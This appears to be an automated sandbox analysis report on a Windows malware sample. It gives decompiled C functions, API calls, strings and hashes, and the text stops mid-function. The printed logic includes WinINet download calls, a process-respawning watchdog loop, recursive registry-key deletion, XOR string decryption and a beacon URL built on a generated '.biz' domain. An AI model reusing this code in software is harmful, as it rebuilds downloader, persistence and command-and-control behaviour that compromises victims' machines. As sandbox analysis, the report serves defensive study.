0x004040d8
0x00000000
0x00000000
0x00000000
0x004040d8
0x004040a7
0x004040ac
0x004040ad
0x004040b2
0x004040b4
0x00000000
0x00000000
0x00000000
0x004040b4
0x004040eb
0x004040eb
0x004040ed
0x004040f2
0x004040f2
0x004040f4
0x00000000
0x00000000
0x004040ff
0x00404100
0x00404100
0x00404107
0x0040410c
0x0040410c
0x0040410c
0x0040410e
0x0040410e
0x00404110
0x00000000
0x00000000
0x0040411b
0x0040411c
0x0040411c
0x00404123
0x00404123
0x00404123
0x00404123
0x00404126
0x00404126
0x00404128
0x00404128
0x0040412a
0x00000000
0x00000000
0x00404138
0x00404144
0x00404145
0x00404145
0x0040414c
0x00404151
0x00404158
0x00404160
0x00404166
0x00404166
0x00000000
0x00404151
0x0040402d
0x00404036
0x0040403b
0x00404042
0x00404049
0x00404049
0x0040404b
0x00000000
0x00000000
0x00404055
0x00404057
0x00404057
0x00000000
0x0040427e
0x0040427e
0x0040427e

APIs

GetProcAddress.KERNEL32(?,InternetOpenA), ref: 004039BA
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004039CA
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 004039DA
GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 004039EA
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 004039FA

Strings

InternetOpenA, xrefs: 0040395A, 004039B4
winrnt.exe, xrefs: 00403A10
InternetCloseHandle, xrefs: 004039A2, 004039EF
InternetSetOptionA, xrefs: 00403990, 004039DF
InternetReadFile, xrefs: 0040397E, 004039CF
InternetOpenUrlA, xrefs: 0040396C, 004039BF

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$winrnt.exe
API String ID: 190572456-2600980705
Opcode ID: 8c60e9bad0216edcd5d2f60f70b2290ab8f73cca25e89bcfd46c5932b96ebbff
Instruction ID: 3464b26757038a97369b87fc09c3feac6c6e71abbe39daa14242ab02e268b348
Opcode Fuzzy Hash: 8c60e9bad0216edcd5d2f60f70b2290ab8f73cca25e89bcfd46c5932b96ebbff
Instruction Fuzzy Hash: 1D11A3B0508642B9C701DB7D4D8459A2D4EB5167213205EB3A0E3FA1E2D7FC8AC18F6E

Uniqueness

Uniqueness Score: -1.00%

Function 004030DE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004030DE(char* __eax) {
				void* _v12;
				int _v16;
				int _v20;
				char* _t26;
				void** _t27;

				_t26 = __eax;
				_t27 =  &_v12;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0x2001f, _t27) != 0) {
					L3:
					if(RegOpenKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0x2001f, _t27) != 0) {
						L7:
						return 0;
					}
					_v16 = 0x22a;
					if(RegQueryValueExA(_v12, "SubshellState", 0,  &_v20, _t26,  &_v16) != 0) {
						RegCloseKey(_v12);
						goto L7;
					}
					L5:
					return _v12;
				}
				_v16 = 0x22a;
				if(RegQueryValueExA(_v12, "SubshellState", 0,  &_v20, _t26,  &_v16) == 0) {
					goto L5;
				}
				RegCloseKey(_v12);
				goto L3;
			}

0x004030e3
0x004030e5
0x00403102
0x00403134
0x0040314d
0x00403185
0x00000000
0x00403185
0x0040314f
0x00403174
0x00403180
0x00000000
0x00403180
0x00403176
0x00000000
0x00403176
0x00403104
0x00403129
0x00000000
0x00000000
0x0040312f
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,00407AA0,004122B0), ref: 004030FB
RegQueryValueExA.ADVAPI32(?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403122
RegCloseKey.ADVAPI32(0002001F,?,SubshellState,00000000,0002001F,?,0000022A,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040312F
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,?,00407AA0,004122B0), ref: 00403146
RegQueryValueExA.ADVAPI32(0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 0040316D
RegCloseKey.ADVAPI32(0002001F,0002001F,SubshellState,00000000,0002001F,?,0000022A,80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,0002001F), ref: 00403180

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 004030F1, 0040313C
SubshellState, xrefs: 00403119, 00403164

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$SubshellState
API String ID: 3677997916-1581766880
Opcode ID: 3c3b49fec9e33612e900ab321f4f4ab453e7f6ba676331166c2ef6ad6fa749c1
Instruction ID: 3beb80fef79f5c207cf2a6ebc17cef41e9b326a57f1f729476a9612e7a75af9c
Opcode Fuzzy Hash: 3c3b49fec9e33612e900ab321f4f4ab453e7f6ba676331166c2ef6ad6fa749c1
Instruction Fuzzy Hash: 4001D6312883017AE710AF51DC46F9B7AEC9F44784F10443FBA49B50D1E6BCED95861E

Uniqueness

Uniqueness Score: -1.00%

Function 00401038 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45
processfilesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401038(CHAR* _a4) {
				char _v88;
				void* _v100;
				void* _v104;
				struct _STARTUPINFOA* _t20;
				void* _t21;
				signed int _t22;
				CHAR* _t23;
				struct _PROCESS_INFORMATION* _t24;

				_t23 = _a4;
				L1:
				_t20 =  &_v88;
				GetStartupInfoA(_t20);
				CreateProcessA(_t23, "--k33p", 0, 0, 0, 0, 0, 0, _t20, _t24);
				_t21 = CreateFileA(_t23, 0x80000000, 0, 0, 3, 0, 0);
				WaitForSingleObject(_v104, 0xffffffff);
				_t22 = _t22 & 0xffffff00 | _t21 != 0x00000000;
				if((_t22 & (0 | _t21 != 0xffffffff)) != 0) {
					CloseHandle(_t21);
				}
				CloseHandle(_v104);
				CloseHandle(_v100);
				goto L1;
			}

0x0040103d
0x00401041
0x00401041
0x00401046
0x00401061
0x0040107d
0x00401083
0x0040108a
0x00401097
0x0040109a
0x0040109a
0x004010a2
0x004010ab
0x00000000

APIs

GetStartupInfoA.KERNEL32(?), ref: 00401046
CreateProcessA.KERNEL32(?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401061
CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401076
WaitForSingleObject.KERNEL32(?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000,00000000), ref: 00401083
CloseHandle.KERNEL32(00000000,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000), ref: 0040109A
CloseHandle.KERNEL32(?,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000,00000000), ref: 004010A2
CloseHandle.KERNEL32(?,?,?,000000FF,?,80000000,00000000,00000000,00000003,00000000,00000000,?,--k33p,00000000,00000000,00000000), ref: 004010AB

Strings

--k33p, xrefs: 0040105B

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseHandle$Create$FileInfoObjectProcessSingleStartupWait
String ID: --k33p
API String ID: 881816827-1573217081
Opcode ID: 9d63912a6165663fb29f0ce3733aad14d24515d983255f787e935eda4860b09f
Instruction ID: a256d911639786f03d362c3fe8c500751f7b31c154176f2d7aa8b79109b77891
Opcode Fuzzy Hash: 9d63912a6165663fb29f0ce3733aad14d24515d983255f787e935eda4860b09f
Instruction Fuzzy Hash: 81F05E30244711BAE62136328C8FF5F355DDF40B24F608A3BB660750D2EA7CB9505A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040172D Relevance: 12.1, APIs: 8, Instructions: 82
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E0040172D(signed int __eax, signed int __edx) {
				char _v20;
				char _v288;
				intOrPtr _v300;
				signed int _v304;
				char _v308;
				intOrPtr _v316;
				char _v320;
				char _v356;
				char _v360;
				signed int _t22;
				signed int _t23;
				char* _t25;
				signed int _t31;
				signed int _t32;
				char* _t35;
				void* _t37;
				signed int* _t38;

				_t38 = _t37 - 0x124;
				_v288 = 1;
				_t35 =  &_v288;
				_push(_t35);
				_push(0x8004667e);
				_push(__eax);
				L00406140();
				_v300 = 0;
				_push(0x10);
				_push(__edx);
				_push(__eax);
				L00406150();
				if(__eax != 0) {
					L00406160();
					if(__eax == 0x2733) {
						_v304 = __eax;
						_v308 = 1;
						_v316 = 0;
						_v320 = _v20;
						_push( &_v320);
						_t22 =  &_v308;
						_push(_t22);
						_push(_t22);
						_push(0);
						_push(0);
						L00406120();
						 *_t38 = _t22;
						_push(_t35);
						_push(0x8004667e);
						_push(__eax);
						L00406140();
						_t23 = _t22 | 0xffffffff;
						if(_v360 == 1) {
							_v356 = 4;
							_push( &_v356);
							_t25 =  &_v360;
							_push(_t25);
							_push(0x1007);
							_push(0xffff);
							_push(__eax);
							L00406170();
							if(_t25 + 1 == 0) {
								L7:
								_t32 = _t31 | 0xffffffff;
							} else {
								_t27 =  *_t38;
								_t32 = 0;
								if(((__edx & 0xffffff00 |  *_t38 != 0x00000000) & (_t27 & 0xffffff00 | _t27 != 0x00002748) & 0x000000ff) != 0) {
									goto L7;
								}
							}
							_t23 = _t32;
						}
					} else {
						_push(_t35);
						_push(0x8004667e);
						_push(__eax);
						L00406140();
						_t23 = __eax | 0xffffffff;
					}
				} else {
					_push(_t35);
					_push(0x8004667e);
					_push(__eax);
					L00406140();
					_t23 = 0;
				}
				return _t23;
			}

0x00401732
0x0040173a
0x00401742
0x00401746
0x00401747
0x0040174c
0x0040174d
0x00401752
0x0040175a
0x0040175c
0x0040175d
0x0040175e
0x00401765
0x0040177a
0x00401784
0x0040179a
0x004017a5
0x004017ad
0x004017b5
0x004017bd
0x004017be
0x004017c2
0x004017c3
0x004017c4
0x004017c6
0x004017c8
0x004017cd
0x004017d0
0x004017d1
0x004017d6
0x004017d7
0x004017dc
0x004017e3
0x004017e5
0x004017f1
0x004017f2
0x004017f6
0x004017f7
0x004017fc
0x00401801
0x00401802
0x00401808
0x00401823
0x00401823
0x0040180a
0x0040180a
0x0040181d
0x00401821
0x00000000
0x00000000
0x00401821
0x00401826
0x00401826
0x00401786
0x00401786
0x00401787
0x0040178c
0x0040178d
0x00401792
0x00401792
0x00401767
0x00401767
0x00401768
0x0040176d
0x0040176e
0x00401773
0x00401773
0x00401831

APIs

ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040174D
connect.WS2_32(00000000,00000002,00000010), ref: 0040175E
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040176E
WSAGetLastError.WS2_32 ref: 0040177A
ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0040178D

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: ioctlsocket$ErrorLastconnect
String ID:
API String ID: 1886816560-0
Opcode ID: e4f2466682005c1bbfe2ccc489831ac4d0005d98a028d0e7b766c9e5207aa5d6
Instruction ID: 80ff8d8e7914a780a02c5522988b0addf1eea3e83e0555c781dce3cf114191c7
Opcode Fuzzy Hash: e4f2466682005c1bbfe2ccc489831ac4d0005d98a028d0e7b766c9e5207aa5d6
Instruction Fuzzy Hash: DF21D3715083016AE720AA318C41FAF76ECEF85319F014A3EF591E61E1E77C995887AB

Uniqueness

Uniqueness Score: -1.00%

Function 004011CF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004011CF(void* __eax, char* __edx, char _a4084, void* _a4848) {
				char _v12;
				void* _v16;
				void* _t20;
				char* _t21;
				void** _t22;

				E00405C00();
				_t21 = __edx;
				_t20 = _a4848;
				if(RegOpenKeyExA(_t20, __edx, 0, 0x20019, _t22) == 0) {
					while(1) {
						_t16 =  &_a4084;
						if(RegEnumKeyA(_v16, 0,  &_a4084, 0x300) != 0) {
							break;
						}
						_t17 =  &_v12;
						wsprintfA( &_v12, "%s\%s");
						E004011CF(_t20, _t17, _t21, _t16);
						_t22 =  &(_t22[4]);
					}
					RegCloseKey(_v16);
				}
				return RegDeleteKeyA(_t20, _t21);
			}

0x004011d8
0x004011e4
0x004011e6
0x004011fb
0x0040121c
0x00401221
0x00401236
0x00000000
0x00000000
0x00401206
0x0040120b
0x00401214
0x00401219
0x00401219
0x0040123b
0x0040123b
0x00401250

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 004011F4
wsprintfA.USER32 ref: 0040120B
RegEnumKeyA.ADVAPI32(?,00000000,?,00000300), ref: 0040122F
RegCloseKey.ADVAPI32(?,00000000,00000000,?,00000300), ref: 0040123B
RegDeleteKeyA.ADVAPI32(?), ref: 00401242

Strings

%s\%s, xrefs: 00401201

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: CloseDeleteEnumOpenwsprintf
String ID: %s\%s
API String ID: 4202809218-4073750446
Opcode ID: 90fe6b9c51703dbfa0923f22b213a36cb3d32ee233706e0e6cf8262339dd137d
Instruction ID: 43378be4e51f8d6f5b4f2e5c17315015ce79a34e9362f07ea0b2f9227eb5dab3
Opcode Fuzzy Hash: 90fe6b9c51703dbfa0923f22b213a36cb3d32ee233706e0e6cf8262339dd137d
Instruction Fuzzy Hash: 93F0C8716842043BE221F2169C82FFB659DDB887D8F00043EF609F51D3EA388D55516A

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB0 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 108
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00401CB0(signed char* __eax) {
				void* _v16;
				char _v80;
				void* _v81;
				char _v82;
				char _v83;
				signed int _v84;
				intOrPtr _v88;
				void* _v89;
				CHAR* _v92;
				signed char* _t32;
				signed int _t33;
				void* _t41;
				intOrPtr _t42;
				int _t44;
				void* _t45;
				signed int _t51;
				signed char* _t54;
				signed char* _t55;
				signed int* _t56;
				char* _t57;
				signed char* _t58;
				signed int _t59;
				signed char* _t60;
				void* _t66;
				CHAR* _t70;
				signed int _t72;
				void* _t74;
				void* _t75;
				void* _t76;

				_t32 = __eax;
				_t60 = __eax;
				_t75 = _t74 - 0x4c;
				_t54 = 0;
				do {
					_t59 =  *_t60 & 0x000000ff;
					if(_t59 == 0x2f) {
						_t54 = _t60;
					}
					_t60 =  &(_t60[1]);
				} while (_t59 != 0);
				if(_t54 == 0) {
					_t55 = _t32;
				} else {
					_t55 =  &(_t54[1]);
				}
				do {
					_t33 = E004010B2();
					_v84 = _t33;
				} while (_v84 == 0 || _v83 == 0 || _v82 == 0 || _v81 == 0);
				_push(_t55);
				L00405E40();
				_t6 = _t33 + 4; // 0x4
				_v88 = _t6;
				E00405C00();
				_t72 =  &_v81 & 0xfffffff0;
				 *_t72 = 0;
				_push(_t55);
				_push(_t72 + 4);
				L00405E20();
				E00405C00();
				_t56 = _t72;
				_v92 =  &_v89 & 0xfffffff0;
				_t41 = _t72 + _v88;
				while(_t56 < _t41) {
					 *_t56 =  *_t56 ^ _v84;
					_t56 =  &(_t56[1]);
					_t41 = _t72 + _v88;
				}
				_t42 =  *0x412198; // 0x0
				_t57 =  &_v80;
				E004014F6(_t42, _t57);
				_t58 = _t72;
				_t44 = wsprintfA(_v92, "http://%s.biz/d/G?", _t57);
				_t76 = _t75 + 0xc;
				_t70 =  &(_v92[_t44]);
				_t45 = _t72 + _v88;
				while(_t58 < _t45) {
					_t51 =  *_t58 & 0x000000ff;
					_t58 =  &(_t58[1]);
					_push(_t51);
					_t70 =  &(_t70[wsprintfA(_t70, "%02X")]);
					_t76 = _t76 + 0xc;
					_t45 = _t72 + _v88;
				}
				 *_t70 = 0;
				_t66 = E004019E8(_v92, 0, 1);
				if(_t66 != 0) {
					 *((intOrPtr*)(_t66 + 0xc)) = 0;
					 *((intOrPtr*)(_t66 + 0x10)) = 1;
					 *(_t66 + 8) = _v84;
				}
				return _t66;
			}

0x00401cb0
0x00401cb1
0x00401cb8
0x00401cbb
0x00401cbd
0x00401cbd
0x00401cc3
0x00401cc5
0x00401cc5
0x00401cc7
0x00401cc8
0x00401cce
0x00401cd3
0x00401cd0
0x00401cd0
0x00401cd0
0x00401cd5
0x00401cd5
0x00401cda
0x00401cdd
0x00401cf5
0x00401cf6
0x00401cfb
0x00401d04
0x00401d07
0x00401d10
0x00401d16
0x00401d1c
0x00401d1d
0x00401d1e
0x00401d2d
0x00401d36
0x00401d3b
0x00401d3e
0x00401d41
0x00401d4b
0x00401d4d
0x00401d50
0x00401d50
0x00401d55
0x00401d5a
0x00401d5f
0x00401d65
0x00401d6f
0x00401d77
0x00401d7d
0x00401d7f
0x00401d82
0x00401d86
0x00401d89
0x00401d8a
0x00401d99
0x00401d9b
0x00401d9e
0x00401d9e
0x00401da3
0x00401db2
0x00401db7
0x00401db9
0x00401dc3
0x00401dca
0x00401dca
0x00401dd6

APIs

lstrlen.KERNEL32(?), ref: 00401CF6
lstrcpy.KERNEL32(?,?), ref: 00401D1E
wsprintfA.USER32 ref: 00401D6F
wsprintfA.USER32 ref: 00401D91

Strings

http://%s.biz/d/G?, xrefs: 00401D67
%02X, xrefs: 00401D8B

Memory Dump Source

Source File: 00000000.00000002.313724914.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.313719317.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313754806.0000000000411000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313759705.0000000000412000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313765323.0000000000414000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313770673.0000000000416000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.313775015.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_KJEfMLiuRS.jbxd

Yara matches

Similarity

API ID: wsprintf$lstrcpylstrlen
String ID: %02X$http://%s.biz/d/G?
API String ID: 1876335253-1405168728
Opcode ID: 953130e01b65f3a85c88ad5837edf32bf0d143c96e7593f3564bd87b3580a917
Instruction ID: 281491f936d579379e8b64b5061a33f835f4fa42bec1d8e938d6b25608a27405
Opcode Fuzzy Hash: 953130e01b65f3a85c88ad5837edf32bf0d143c96e7593f3564bd87b3580a917
Instruction Fuzzy Hash: F3312631A042498BDB10DBE5C88179BBBF4AF41318F54463AE451AB2D6EB7CE945CB88

Uniqueness

Uniqueness Score: -1.00%

Function 004044D6 Relevance: 7.5, APIs: 5, Instructions: 37
filethreadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004044D6() {
				void* _t337;
				char* _t342;
				int _t345;
				signed char* _t364;
				int _t367;
				void* _t369;
				int _t370;
				int _t371;
				void* _t375;
				int _t376;
				int _t377;
				CHAR* _t380;
				int _t382;
				long _t383;
				CHAR* _t384;
				int _t386;
				long _t387;
				CHAR* _t392;
				void* _t394;
				CHAR* _t395;
				void* _t397;
				char* _t407;
				int _t408;
				signed char* _t413;
				int _t416;
				int _t417;
				int _t423;
				int _t424;
				int _t429;
				int _t434;
				int _t436;
				void* _t438;
				int _t442;
				void* _t444;
				int _t449;
				long _t453;
				int _t454;
				int _t460;
				int _t462;
				int _t465;
				int _t472;
				int _t474;
				int _t476;
				int _t481;
				int _t484;
				int _t486;
				int _t489;
				int _t491;
				void* _t495;
				int _t500;
				int _t502;
				int _t504;
				int _t508;
				void* _t509;
				void* _t511;
				char* _t512;
				char* _t513;
				int _t514;
				char* _t515;
				char* _t516;
				char* _t517;
				char* _t518;
				char* _t519;
				int _t520;
				char* _t521;
				int _t522;
				char* _t524;
				CHAR* _t525;
				int _t529;
				int _t531;
				int _t534;
				void* _t548;
				int _t549;
				int _t552;
				CHAR* _t558;
				int _t560;
				long _t561;
				int _t566;
				int _t574;
				int _t575;
				signed char _t583;
				int _t589;
				int _t593;
				void* _t595;
				int _t596;
				void* _t599;
				signed char _t610;
				int _t611;
				signed char* _t612;
				void* _t613;
				void* _t615;
				int _t620;
				void* _t622;
				void* _t623;
				int* _t624;
				signed int* _t627;
				long _t637;
				int _t638;
				signed char _t648;
				void* _t651;
				int _t653;
				int _t654;
				CHAR* _t655;
				void* _t656;
				void* _t658;
				int _t661;
				void* _t663;
				void* _t664;
				void* _t665;
				signed int* _t668;
				void* _t677;
				int _t678;
				signed char _t688;
				CHAR* _t696;
				char* _t697;
				CHAR* _t698;
				CHAR* _t699;
				CHAR* _t700;
				CHAR* _t701;
				CHAR* _t702;
				CHAR* _t703;
				CHAR* _t704;
				int* _t705;
				void** _t706;
				char* _t707;
				char* _t708;
				CHAR* _t709;
				int _t712;
				char* _t713;
				char* _t715;
				char* _t716;
				char* _t717;
				int* _t718;
				CHAR* _t719;
				int _t720;
				CHAR* _t721;
				CHAR* _t722;
				void* _t723;
				signed int* _t725;
				char* _t726;
				void* _t727;
				CHAR* _t728;
				CHAR* _t729;
				void* _t730;
				signed int* _t732;
				char* _t733;
				signed char _t734;
				int* _t738;
				int* _t739;
				int _t740;
				int _t742;
				int _t743;
				void* _t744;
				signed int* _t768;
				signed char* _t769;
				signed char* _t770;
				signed int* _t772;
				signed int* _t775;
				char* _t777;
				signed char* _t778;
				void* _t779;
				void* _t780;
				signed int* _t781;
				void** _t782;
				int _t784;
				void** _t785;
				void** _t786;
				char* _t787;
				CHAR* _t788;
				signed char* _t789;
				int* _t790;
				signed int* _t791;
				void* _t792;
				void* _t793;
				char* _t794;
				signed int* _t795;
				void* _t796;
				char* _t797;
				signed int* _t798;
				long _t799;
				struct _FILETIME* _t800;
				void* _t801;
				int* _t802;

				if(_t337 == 0xffffffff) {
					 *(_t801 + 0x14) = 0;
					_t799 = 0;
					__eflags = 0;
				} else {
					_t799 = GetFileSize(_t337, 0);
					 *(_t801 + 0x14) = E00401000(_t691);
					ReadFile( *(_t801 + 0xb0),  *(_t801 + 0x20), _t799, _t801 + 0xa0, 0);
					CloseHandle( *(_t801 + 0xa0));
				}
				CloseHandle(CreateThread(0, 0x1000, E00401038, _t801 + 0x1570, 0, _t801 + 0x9c));
				_t342 = 0x408720;
				goto L4;
				L7:
				__eflags = 0x407b20 - 0x408720;
				if(0x407b20 < 0x408720) {
					 *0x407b20 =  *0x407b20 ^ 0x0000004d;
					__eflags =  *0x407b20;
					 *(_t799 + 0x40) =  *(_t799 + 0x40) ^ _t734;
					goto L7;
				}
				__eflags =  *0x412100 - 2;
				if( *0x412100 != 2) {
					L35:
					 *(_t801 + 0x78) = 0x10;
					_t696 = _t801 + 0x1ec;
					_t345 = GetComputerNameA(_t696, _t801 + 0x78);
					__eflags = _t345;
					if(_t345 == 0) {
						L37:
						_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
						_push(_t801 + 0x1bc);
						L00405E20();
						L41:
						wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t801 + 0x1f4)),  *((char*)(_t801 + 0x1f1)),  *((char*)(_t801 + 0x1ee)),  *((char*)(_t801 + 0x1eb)),  *((char*)(_t801 + 0x1e8)),  *((char*)(_t801 + 0x1e5)),  *((char*)(_t801 + 0x1e2)),  *((char*)(_t801 + 0x1df)),  *((char*)(_t801 + 0x1dc)),  *((char*)(_t801 + 0x1d9)),  *((char*)(_t801 + 0x1d6)),  *((char*)(_t801 + 0x1d3)),  *((char*)(_t801 + 0x1d0)),  *((char*)(_t801 + 0x1cd)),  *((char*)(_t801 + 0x1ca)),  *((char*)(_t801 + 0x1c7)));
						_t802 = _t801 + 0x48;
						_t364 = 0x407aa0;
						while(1) {
							__eflags = _t364 - 0x407ad5;
							if(_t364 >= 0x407ad5) {
								break;
							}
							 *_t364 =  *_t364 ^ 0x000000d4;
